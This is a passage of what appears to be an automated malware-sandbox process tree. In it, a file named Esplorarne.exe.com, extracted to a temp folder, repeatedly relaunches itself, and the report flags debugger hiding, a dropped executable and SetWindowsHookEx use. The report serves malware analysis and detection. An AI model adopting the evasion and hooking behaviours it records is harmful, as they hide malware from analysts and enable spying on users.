C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i46⤵PID:5444
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i47⤵PID:1816
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i48⤵PID:4352
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i49⤵PID:8292
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i50⤵PID:4796
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i51⤵PID:5152
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i52⤵PID:9144
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i53⤵PID:8728
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i54⤵PID:2372
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i55⤵PID:3600
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i56⤵PID:6640
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i57⤵PID:1720
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i58⤵PID:7632
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i59⤵PID:5840
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i60⤵PID:8136
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i61⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:8388 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i62⤵PID:4724
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i63⤵PID:5428
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i64⤵PID:7780
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i65⤵PID:1352
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i66⤵PID:8636
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i67⤵PID:8912
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i68⤵PID:6396
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i69⤵PID:8332
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i70⤵PID:6752
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i71⤵PID:9012
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i72⤵PID:4448
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i73⤵PID:8708
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i74⤵PID:7688
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i75⤵PID:4244
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i76⤵PID:7972
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i77⤵PID:7828
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i78⤵PID:7020
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i79⤵PID:3156
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i80⤵PID:5196
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i81⤵PID:9036
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i82⤵
- Executes dropped EXE
PID:5456 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i83⤵PID:5532
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i84⤵PID:4560
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i85⤵PID:2400
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i86⤵PID:9136
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i87⤵PID:6372
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i88⤵PID:6676
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i89⤵PID:9012
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i90⤵PID:4448
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i91⤵PID:8708
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i92⤵PID:8252
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i93⤵PID:9084
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i94⤵PID:8964
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i95⤵PID:4984
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i96⤵PID:7192
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i97⤵PID:2248
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i98⤵PID:8936
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i99⤵PID:7264
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i100⤵PID:7128
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i101⤵PID:4056
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i102⤵PID:7032
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i103⤵PID:196
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i104⤵PID:1160
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i105⤵PID:7496
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i106⤵PID:8252
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i107⤵PID:7836
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i108⤵PID:8264
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i109⤵PID:8164
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i110⤵PID:1764
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i111⤵PID:2248
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i112⤵PID:8324
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i113⤵PID:8412
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i114⤵PID:8920
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i115⤵PID:8076
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i116⤵PID:5772
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i117⤵PID:6464
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i118⤵PID:8716
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i119⤵PID:6216
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i120⤵PID:7064
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i121⤵PID:6716
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i122⤵
- Suspicious use of SetWindowsHookEx
PID:5276
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-